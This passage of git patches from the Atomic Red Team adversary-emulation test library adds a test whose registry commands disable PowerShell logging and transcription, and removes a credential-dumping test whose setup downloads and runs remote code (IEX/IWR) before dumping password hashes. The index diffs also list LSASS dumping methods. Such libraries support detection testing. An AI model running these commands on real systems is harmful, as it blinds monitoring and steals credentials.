+    elevation_required: true
+- name: Windows Powershell Logging Disabled
+  auto_generated_guid: 95b25212-91a7-42ff-9613-124aca6845a8
+  description: |
+    Modify the registry of the currently logged in user using reg.exe via cmd console to disable Powershell Module Logging, Script Block Logging, Transcription and Script Execution
+    see https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.PowerShell::EnableModuleLogging
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg  add HKCU\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging /v EnableModuleLogging /t REG_DWORD /d 0 /f
+      reg  add HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging /v EnableScriptBlockLogging /t REG_DWORD /d 0 /f
+      reg  add HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription /v EnableTranscripting /t REG_DWORD /d 0 /f
+      reg  add HKCU\Software\Policies\Microsoft\Windows\PowerShell /v EnableScripts /t REG_DWORD /d 0 /f
+    cleanup_command: |
+      reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging /v EnableModuleLogging /f >nul 2>&1
+      reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging /v EnableScriptBlockLogging /f >nul 2>&1
+      reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription /v EnableTranscripting /f >nul 2>&1
+      reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell /v EnableScripts /f >nul 2>&1
     name: command_prompt
     elevation_required: true

From 84a753eb233b187b78af00458aba2282127b9da6 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team GUID generator <email>
Date: Fri, 18 Mar 2022 20:07:11 +0000
Subject: [PATCH 75/83] Generate GUIDs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/used_guids.txt | 1 +
 1 file changed, 1 insertion(+)

diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index e2b027a3..9f881dc3 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -932,3 +932,4 @@ a4637291-40b1-4a96-8c82-b28f1d73e54e
 f650456b-bd49-4bc1-ae9d-271b5b9581e7
 66e647d1-8741-4e43-b7c1-334760c2047f
 795d3248-0394-4d4d-8e86-4e8df2a2693f
+95b25212-91a7-42ff-9613-124aca6845a8

From b4893d15adcdf1e5ab0a2fef19fbb4b97499a6ab Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Fri, 18 Mar 2022 20:07:16 +0000
Subject: [PATCH 76/83] Generate docs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/Indexes/Indexes-CSV/index.csv         |  1 +
 atomics/Indexes/Indexes-CSV/windows-index.csv |  1 +
 atomics/Indexes/Indexes-Markdown/index.md     |  1 +
 .../Indexes/Indexes-Markdown/windows-index.md |  1 +
 atomics/Indexes/index.yaml                    | 22 +++++++++-
 atomics/T1112/T1112.md                        | 43 ++++++++++++++++++-
 6 files changed, 67 insertions(+), 2 deletions(-)

diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 8344679a..9f786fc3 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -505,6 +505,7 @@ defense-evasion,T1112,Modify Registry,28,Windows HideSCANetwork Group Policy Fea
 defense-evasion,T1112,Modify Registry,29,Windows HideSCAPower Group Policy Feature,8d85a5d8-702f-436f-bc78-fcd9119496fc,command_prompt
 defense-evasion,T1112,Modify Registry,30,Windows HideSCAVolume Group Policy Feature,7f037590-b4c6-4f13-b3cc-e424c5ab8ade,command_prompt
 defense-evasion,T1112,Modify Registry,31,Windows Modify Show Compress Color And Info Tip Registry,795d3248-0394-4d4d-8e86-4e8df2a2693f,command_prompt
+defense-evasion,T1112,Modify Registry,32,Windows Powershell Logging Disabled,95b25212-91a7-42ff-9613-124aca6845a8,command_prompt
 defense-evasion,T1218.005,Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt
 defense-evasion,T1218.005,Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt
 defense-evasion,T1218.005,Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 4fc63db9..c360f681 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -335,6 +335,7 @@ defense-evasion,T1112,Modify Registry,28,Windows HideSCANetwork Group Policy Fea
 defense-evasion,T1112,Modify Registry,29,Windows HideSCAPower Group Policy Feature,8d85a5d8-702f-436f-bc78-fcd9119496fc,command_prompt
 defense-evasion,T1112,Modify Registry,30,Windows HideSCAVolume Group Policy Feature,7f037590-b4c6-4f13-b3cc-e424c5ab8ade,command_prompt
 defense-evasion,T1112,Modify Registry,31,Windows Modify Show Compress Color And Info Tip Registry,795d3248-0394-4d4d-8e86-4e8df2a2693f,command_prompt
+defense-evasion,T1112,Modify Registry,32,Windows Powershell Logging Disabled,95b25212-91a7-42ff-9613-124aca6845a8,command_prompt
 defense-evasion,T1218.005,Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt
 defense-evasion,T1218.005,Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt
 defense-evasion,T1218.005,Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 2d17e41a..acedc648 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -780,6 +780,7 @@
   - Atomic Test #29: Windows HideSCAPower Group Policy Feature [windows]
   - Atomic Test #30: Windows HideSCAVolume Group Policy Feature [windows]
   - Atomic Test #31: Windows Modify Show Compress Color And Info Tip Registry [windows]
+  - Atomic Test #32: Windows Powershell Logging Disabled [windows]
 - T1601 Modify System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1218.005 Mshta](../../T1218.005/T1218.005.md)
   - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 0defaf92..b03e5140 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -547,6 +547,7 @@
   - Atomic Test #29: Windows HideSCAPower Group Policy Feature [windows]
   - Atomic Test #30: Windows HideSCAVolume Group Policy Feature [windows]
   - Atomic Test #31: Windows Modify Show Compress Color And Info Tip Registry [windows]
+  - Atomic Test #32: Windows Powershell Logging Disabled [windows]
 - [T1218.005 Mshta](../../T1218.005/T1218.005.md)
   - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
   - Atomic Test #2: Mshta executes VBScript to execute malicious command [windows]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index a99d8565..4a7a7757 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -32237,7 +32237,27 @@ defense-evasion:
           reg  add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowCompColor /t REG_DWORD /d 0 /f
         cleanup_command: |
           reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowInfoTip /f >nul 2>&1
-          reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowCompColor/f >nul 2>&1
+          reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowCompColor /f >nul 2>&1
+        name: command_prompt
+        elevation_required: true
+    - name: Windows Powershell Logging Disabled
+      auto_generated_guid: 95b25212-91a7-42ff-9613-124aca6845a8
+      description: |
+        Modify the registry of the currently logged in user using reg.exe via cmd console to disable Powershell Module Logging, Script Block Logging, Transcription and Script Execution
+        see https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.PowerShell::EnableModuleLogging
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          reg  add HKCU\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging /v EnableModuleLogging /t REG_DWORD /d 0 /f
+          reg  add HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging /v EnableScriptBlockLogging /t REG_DWORD /d 0 /f
+          reg  add HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription /v EnableTranscripting /t REG_DWORD /d 0 /f
+          reg  add HKCU\Software\Policies\Microsoft\Windows\PowerShell /v EnableScripts /t REG_DWORD /d 0 /f
+        cleanup_command: |
+          reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging /v EnableModuleLogging /f >nul 2>&1
+          reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging /v EnableScriptBlockLogging /f >nul 2>&1
+          reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription /v EnableTranscripting /f >nul 2>&1
+          reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell /v EnableScripts /f >nul 2>&1
         name: command_prompt
         elevation_required: true
   T1601:
diff --git a/atomics/T1112/T1112.md b/atomics/T1112/T1112.md
index 7777c1a3..cbc144da 100644
--- a/atomics/T1112/T1112.md
+++ b/atomics/T1112/T1112.md
@@ -72,6 +72,8 @@ The Registry of a remote system may be modified to aid in execution of files as
 
 - [Atomic Test #31 - Windows Modify Show Compress Color And Info Tip Registry](#atomic-test-31---windows-modify-show-compress-color-and-info-tip-registry)
 
+- [Atomic Test #32 - Windows Powershell Logging Disabled](#atomic-test-32---windows-powershell-logging-disabled)
+
 
 <br/>
 
@@ -1152,7 +1154,46 @@ reg  add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v Sho
 #### Cleanup Commands:
 ```cmd
 reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowInfoTip /f >nul 2>&1
-reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowCompColor/f >nul 2>&1
+reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowCompColor /f >nul 2>&1
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #32 - Windows Powershell Logging Disabled
+Modify the registry of the currently logged in user using reg.exe via cmd console to disable Powershell Module Logging, Script Block Logging, Transcription and Script Execution
+see https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.PowerShell::EnableModuleLogging
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 95b25212-91a7-42ff-9613-124aca6845a8
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg  add HKCU\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging /v EnableModuleLogging /t REG_DWORD /d 0 /f
+reg  add HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging /v EnableScriptBlockLogging /t REG_DWORD /d 0 /f
+reg  add HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription /v EnableTranscripting /t REG_DWORD /d 0 /f
+reg  add HKCU\Software\Policies\Microsoft\Windows\PowerShell /v EnableScripts /t REG_DWORD /d 0 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging /v EnableModuleLogging /f >nul 2>&1
+reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging /v EnableScriptBlockLogging /f >nul 2>&1
+reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription /v EnableTranscripting /f >nul 2>&1
+reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell /v EnableScripts /f >nul 2>&1
 ```
 
 

From 30177c92f873f0a295124ea50806c35ef8702c43 Mon Sep 17 00:00:00 2001
From: Carrie Roberts <clr2of8@gmail.com>
Date: Mon, 21 Mar 2022 16:33:53 -0600
Subject: [PATCH 77/83] delete broken wce test (#1822)

---
 atomics/T1003.001/T1003.001.yaml | 50 --------------------------------
 1 file changed, 50 deletions(-)

diff --git a/atomics/T1003.001/T1003.001.yaml b/atomics/T1003.001/T1003.001.yaml
index 8f5c91e8..095c52dc 100644
--- a/atomics/T1003.001/T1003.001.yaml
+++ b/atomics/T1003.001/T1003.001.yaml
@@ -1,56 +1,6 @@
 attack_technique: T1003.001
 display_name: "OS Credential Dumping: LSASS Memory"
 atomic_tests:
-- name: Windows Credential Editor
-  auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
-  description: |
-    Dump user credentials using Windows Credential Editor (supports Windows XP, 2003, Vista, 7, 2008 and Windows 8 only)
-
-    Upon successful execution, you should see a file with user passwords/hashes at %temp%/wce-output.file.
-
-    If you see no output it is likely that execution was blocked by Anti-Virus. 
-
-    If you see a message saying \"wce.exe is not recognized as an internal or external command\", try using the  get-prereq_commands to download and install Windows Credential Editor first.
-  supported_platforms:
-  - windows
-  input_arguments:
-    output_file:
-      description: Path where resulting data should be placed
-      type: Path
-      default: '%temp%\wce-output.txt'
-    wce_zip_hash:
-      description: File hash of the Windows Credential Editor zip file
-      type: String
-      default: 8F4EFA0DDE5320694DD1AA15542FE44FDE4899ED7B3A272063902E773B6C4933
-    wce_exe:
-      description: Path of Windows Credential Editor executable
-      type: Path
-      default: PathToAtomicsFolder\T1003.001\bin\wce.exe
-    wce_url:
-      description: Path to download Windows Credential Editor zip file
-      type: Url
-      default: https://www.ampliasecurity.com/research/wce_v1_41beta_universal.zip
-  dependency_executor_name: powershell
-  dependencies:
-  - description: |
-      Windows Credential Editor must exist on disk at specified location (#{wce_exe})
-    prereq_command: |
-      if (Test-Path #{wce_exe}) {exit 0} else {exit 1}
-    get_prereq_command: |
-      $parentpath = Split-Path "#{wce_exe}"; $zippath = "$parentpath\wce.zip"
-      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-      IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1" -UseBasicParsing)
-      if(Invoke-WebRequestVerifyHash "#{wce_url}" "$zippath" #{wce_zip_hash}){
-        Expand-Archive $zippath $parentpath\wce -Force
-        Move-Item $parentpath\wce\wce.exe "#{wce_exe}"
-        Remove-Item $zippath, $parentpath\wce -Recurse
-      }
-  executor:
-    command: |
-      #{wce_exe} -o #{output_file}
-    cleanup_command: del "#{output_file}" >nul 2>&1
-    name: command_prompt
-    elevation_required: true
 - name: Dump LSASS.exe Memory using ProcDump
   auto_generated_guid: 0be2230c-9ab3-4ac2-8826-3199b9a0ebf8
   description: |

From 2e2691614773477407054e49e3609fbf44371150 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Mon, 21 Mar 2022 22:34:50 +0000
Subject: [PATCH 78/83] Generate docs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/Indexes/Indexes-CSV/index.csv         |  25 ++--
 atomics/Indexes/Indexes-CSV/windows-index.csv |  25 ++--
 atomics/Indexes/Indexes-Markdown/index.md     |  25 ++--
 .../Indexes/Indexes-Markdown/windows-index.md |  25 ++--
 atomics/Indexes/index.yaml                    |  51 --------
 atomics/T1003.001/T1003.001.md                | 115 ++++--------------
 6 files changed, 72 insertions(+), 194 deletions(-)

diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 9f786fc3..3e44f2c3 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -53,19 +53,18 @@ credential-access,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-b
 credential-access,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh
 credential-access,T1557.001,LLMNR/NBT-NS Poisoning and SMB Relay,1,LLMNR Poisoning with Inveigh (PowerShell),deecd55f-afe0-4a62-9fba-4d1ba2deb321,powershell
 credential-access,T1003.004,LSA Secrets,1,Dumping LSA Secrets,55295ab0-a703-433b-9ca4-ae13807de12f,command_prompt
-credential-access,T1003.001,LSASS Memory,1,Windows Credential Editor,0f7c5301-6859-45ba-8b4d-1fac30fc31ed,command_prompt
-credential-access,T1003.001,LSASS Memory,2,Dump LSASS.exe Memory using ProcDump,0be2230c-9ab3-4ac2-8826-3199b9a0ebf8,command_prompt
-credential-access,T1003.001,LSASS Memory,3,Dump LSASS.exe Memory using comsvcs.dll,2536dee2-12fb-459a-8c37-971844fa73be,powershell
-credential-access,T1003.001,LSASS Memory,4,Dump LSASS.exe Memory using direct system calls and API unhooking,7ae7102c-a099-45c8-b985-4c7a2d05790d,command_prompt
-credential-access,T1003.001,LSASS Memory,5,Dump LSASS.exe Memory using NanoDump,dddd4aca-bbed-46f0-984d-e4c5971c51ea,command_prompt
-credential-access,T1003.001,LSASS Memory,6,Dump LSASS.exe Memory using Windows Task Manager,dea6c349-f1c6-44f3-87a1-1ed33a59a607,manual
-credential-access,T1003.001,LSASS Memory,7,Offline Credential Theft With Mimikatz,453acf13-1dbd-47d7-b28a-172ce9228023,command_prompt
-credential-access,T1003.001,LSASS Memory,8,LSASS read with pypykatz,c37bc535-5c62-4195-9cc3-0517673171d8,command_prompt
-credential-access,T1003.001,LSASS Memory,9,Dump LSASS.exe Memory using Out-Minidump.ps1,6502c8f0-b775-4dbd-9193-1298f56b6781,powershell
-credential-access,T1003.001,LSASS Memory,10,Create Mini Dump of LSASS.exe using ProcDump,7cede33f-0acd-44ef-9774-15511300b24b,command_prompt
-credential-access,T1003.001,LSASS Memory,11,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell
-credential-access,T1003.001,LSASS Memory,12,Dump LSASS with .Net 5 createdump.exe,9d0072c8-7cca-45c4-bd14-f852cfa35cf0,powershell
-credential-access,T1003.001,LSASS Memory,13,Dump LSASS.exe using imported Microsoft DLLs,86fc3f40-237f-4701-b155-81c01c48d697,powershell
+credential-access,T1003.001,LSASS Memory,1,Dump LSASS.exe Memory using ProcDump,0be2230c-9ab3-4ac2-8826-3199b9a0ebf8,command_prompt
+credential-access,T1003.001,LSASS Memory,2,Dump LSASS.exe Memory using comsvcs.dll,2536dee2-12fb-459a-8c37-971844fa73be,powershell
+credential-access,T1003.001,LSASS Memory,3,Dump LSASS.exe Memory using direct system calls and API unhooking,7ae7102c-a099-45c8-b985-4c7a2d05790d,command_prompt
+credential-access,T1003.001,LSASS Memory,4,Dump LSASS.exe Memory using NanoDump,dddd4aca-bbed-46f0-984d-e4c5971c51ea,command_prompt
+credential-access,T1003.001,LSASS Memory,5,Dump LSASS.exe Memory using Windows Task Manager,dea6c349-f1c6-44f3-87a1-1ed33a59a607,manual
+credential-access,T1003.001,LSASS Memory,6,Offline Credential Theft With Mimikatz,453acf13-1dbd-47d7-b28a-172ce9228023,command_prompt
+credential-access,T1003.001,LSASS Memory,7,LSASS read with pypykatz,c37bc535-5c62-4195-9cc3-0517673171d8,command_prompt
+credential-access,T1003.001,LSASS Memory,8,Dump LSASS.exe Memory using Out-Minidump.ps1,6502c8f0-b775-4dbd-9193-1298f56b6781,powershell
+credential-access,T1003.001,LSASS Memory,9,Create Mini Dump of LSASS.exe using ProcDump,7cede33f-0acd-44ef-9774-15511300b24b,command_prompt
+credential-access,T1003.001,LSASS Memory,10,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell
+credential-access,T1003.001,LSASS Memory,11,Dump LSASS with .Net 5 createdump.exe,9d0072c8-7cca-45c4-bd14-f852cfa35cf0,powershell
+credential-access,T1003.001,LSASS Memory,12,Dump LSASS.exe using imported Microsoft DLLs,86fc3f40-237f-4701-b155-81c01c48d697,powershell
 credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
 credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
 credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index c360f681..42ff77ea 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -33,19 +33,18 @@ credential-access,T1558.003,Kerberoasting,5,Request All Tickets via PowerShell,9
 credential-access,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
 credential-access,T1557.001,LLMNR/NBT-NS Poisoning and SMB Relay,1,LLMNR Poisoning with Inveigh (PowerShell),deecd55f-afe0-4a62-9fba-4d1ba2deb321,powershell
 credential-access,T1003.004,LSA Secrets,1,Dumping LSA Secrets,55295ab0-a703-433b-9ca4-ae13807de12f,command_prompt
-credential-access,T1003.001,LSASS Memory,1,Windows Credential Editor,0f7c5301-6859-45ba-8b4d-1fac30fc31ed,command_prompt
-credential-access,T1003.001,LSASS Memory,2,Dump LSASS.exe Memory using ProcDump,0be2230c-9ab3-4ac2-8826-3199b9a0ebf8,command_prompt
-credential-access,T1003.001,LSASS Memory,3,Dump LSASS.exe Memory using comsvcs.dll,2536dee2-12fb-459a-8c37-971844fa73be,powershell
-credential-access,T1003.001,LSASS Memory,4,Dump LSASS.exe Memory using direct system calls and API unhooking,7ae7102c-a099-45c8-b985-4c7a2d05790d,command_prompt
-credential-access,T1003.001,LSASS Memory,5,Dump LSASS.exe Memory using NanoDump,dddd4aca-bbed-46f0-984d-e4c5971c51ea,command_prompt
-credential-access,T1003.001,LSASS Memory,6,Dump LSASS.exe Memory using Windows Task Manager,dea6c349-f1c6-44f3-87a1-1ed33a59a607,manual
-credential-access,T1003.001,LSASS Memory,7,Offline Credential Theft With Mimikatz,453acf13-1dbd-47d7-b28a-172ce9228023,command_prompt
-credential-access,T1003.001,LSASS Memory,8,LSASS read with pypykatz,c37bc535-5c62-4195-9cc3-0517673171d8,command_prompt
-credential-access,T1003.001,LSASS Memory,9,Dump LSASS.exe Memory using Out-Minidump.ps1,6502c8f0-b775-4dbd-9193-1298f56b6781,powershell
-credential-access,T1003.001,LSASS Memory,10,Create Mini Dump of LSASS.exe using ProcDump,7cede33f-0acd-44ef-9774-15511300b24b,command_prompt
-credential-access,T1003.001,LSASS Memory,11,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell
-credential-access,T1003.001,LSASS Memory,12,Dump LSASS with .Net 5 createdump.exe,9d0072c8-7cca-45c4-bd14-f852cfa35cf0,powershell
-credential-access,T1003.001,LSASS Memory,13,Dump LSASS.exe using imported Microsoft DLLs,86fc3f40-237f-4701-b155-81c01c48d697,powershell
+credential-access,T1003.001,LSASS Memory,1,Dump LSASS.exe Memory using ProcDump,0be2230c-9ab3-4ac2-8826-3199b9a0ebf8,command_prompt
+credential-access,T1003.001,LSASS Memory,2,Dump LSASS.exe Memory using comsvcs.dll,2536dee2-12fb-459a-8c37-971844fa73be,powershell
+credential-access,T1003.001,LSASS Memory,3,Dump LSASS.exe Memory using direct system calls and API unhooking,7ae7102c-a099-45c8-b985-4c7a2d05790d,command_prompt
+credential-access,T1003.001,LSASS Memory,4,Dump LSASS.exe Memory using NanoDump,dddd4aca-bbed-46f0-984d-e4c5971c51ea,command_prompt
+credential-access,T1003.001,LSASS Memory,5,Dump LSASS.exe Memory using Windows Task Manager,dea6c349-f1c6-44f3-87a1-1ed33a59a607,manual
+credential-access,T1003.001,LSASS Memory,6,Offline Credential Theft With Mimikatz,453acf13-1dbd-47d7-b28a-172ce9228023,command_prompt
+credential-access,T1003.001,LSASS Memory,7,LSASS read with pypykatz,c37bc535-5c62-4195-9cc3-0517673171d8,command_prompt
+credential-access,T1003.001,LSASS Memory,8,Dump LSASS.exe Memory using Out-Minidump.ps1,6502c8f0-b775-4dbd-9193-1298f56b6781,powershell
+credential-access,T1003.001,LSASS Memory,9,Create Mini Dump of LSASS.exe using ProcDump,7cede33f-0acd-44ef-9774-15511300b24b,command_prompt
+credential-access,T1003.001,LSASS Memory,10,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell
+credential-access,T1003.001,LSASS Memory,11,Dump LSASS with .Net 5 createdump.exe,9d0072c8-7cca-45c4-bd14-f852cfa35cf0,powershell
+credential-access,T1003.001,LSASS Memory,12,Dump LSASS.exe using imported Microsoft DLLs,86fc3f40-237f-4701-b155-81c01c48d697,powershell
 credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
 credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
 credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index acedc648..4471bbbd 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -83,19 +83,18 @@
 - [T1003.004 LSA Secrets](../../T1003.004/T1003.004.md)
   - Atomic Test #1: Dumping LSA Secrets [windows]
 - [T1003.001 LSASS Memory](../../T1003.001/T1003.001.md)
-  - Atomic Test #1: Windows Credential Editor [windows]
-  - Atomic Test #2: Dump LSASS.exe Memory using ProcDump [windows]
-  - Atomic Test #3: Dump LSASS.exe Memory using comsvcs.dll [windows]
-  - Atomic Test #4: Dump LSASS.exe Memory using direct system calls and API unhooking [windows]
-  - Atomic Test #5: Dump LSASS.exe Memory using NanoDump [windows]
-  - Atomic Test #6: Dump LSASS.exe Memory using Windows Task Manager [windows]
-  - Atomic Test #7: Offline Credential Theft With Mimikatz [windows]
-  - Atomic Test #8: LSASS read with pypykatz [windows]
-  - Atomic Test #9: Dump LSASS.exe Memory using Out-Minidump.ps1 [windows]
-  - Atomic Test #10: Create Mini Dump of LSASS.exe using ProcDump [windows]
-  - Atomic Test #11: Powershell Mimikatz [windows]
-  - Atomic Test #12: Dump LSASS with .Net 5 createdump.exe [windows]
-  - Atomic Test #13: Dump LSASS.exe using imported Microsoft DLLs [windows]
+  - Atomic Test #1: Dump LSASS.exe Memory using ProcDump [windows]
+  - Atomic Test #2: Dump LSASS.exe Memory using comsvcs.dll [windows]
+  - Atomic Test #3: Dump LSASS.exe Memory using direct system calls and API unhooking [windows]
+  - Atomic Test #4: Dump LSASS.exe Memory using NanoDump [windows]
+  - Atomic Test #5: Dump LSASS.exe Memory using Windows Task Manager [windows]
+  - Atomic Test #6: Offline Credential Theft With Mimikatz [windows]
+  - Atomic Test #7: LSASS read with pypykatz [windows]
+  - Atomic Test #8: Dump LSASS.exe Memory using Out-Minidump.ps1 [windows]
+  - Atomic Test #9: Create Mini Dump of LSASS.exe using ProcDump [windows]
+  - Atomic Test #10: Powershell Mimikatz [windows]
+  - Atomic Test #11: Dump LSASS with .Net 5 createdump.exe [windows]
+  - Atomic Test #12: Dump LSASS.exe using imported Microsoft DLLs [windows]
 - T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1003.003 NTDS](../../T1003.003/T1003.003.md)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index b03e5140..ce47d683 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -58,19 +58,18 @@
 - [T1003.004 LSA Secrets](../../T1003.004/T1003.004.md)
   - Atomic Test #1: Dumping LSA Secrets [windows]
 - [T1003.001 LSASS Memory](../../T1003.001/T1003.001.md)
-  - Atomic Test #1: Windows Credential Editor [windows]
-  - Atomic Test #2: Dump LSASS.exe Memory using ProcDump [windows]
-  - Atomic Test #3: Dump LSASS.exe Memory using comsvcs.dll [windows]
-  - Atomic Test #4: Dump LSASS.exe Memory using direct system calls and API unhooking [windows]
-  - Atomic Test #5: Dump LSASS.exe Memory using NanoDump [windows]
-  - Atomic Test #6: Dump LSASS.exe Memory using Windows Task Manager [windows]
-  - Atomic Test #7: Offline Credential Theft With Mimikatz [windows]
-  - Atomic Test #8: LSASS read with pypykatz [windows]
-  - Atomic Test #9: Dump LSASS.exe Memory using Out-Minidump.ps1 [windows]
-  - Atomic Test #10: Create Mini Dump of LSASS.exe using ProcDump [windows]
-  - Atomic Test #11: Powershell Mimikatz [windows]
-  - Atomic Test #12: Dump LSASS with .Net 5 createdump.exe [windows]
-  - Atomic Test #13: Dump LSASS.exe using imported Microsoft DLLs [windows]
